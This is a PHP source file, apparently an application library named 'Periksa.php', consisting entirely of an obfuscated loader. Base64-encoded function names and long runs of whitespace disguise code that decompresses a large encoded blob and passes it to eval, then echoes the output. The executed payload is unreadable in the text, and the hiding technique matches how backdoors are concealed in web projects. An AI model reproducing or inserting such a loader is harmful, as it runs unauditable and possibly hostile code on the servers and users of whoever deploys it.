<?php 
        $__='printf';$_='Loading app/Libraries/Periksa.php';
        







































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






































































































































































































                                                                                                                                                                                                                     $________;
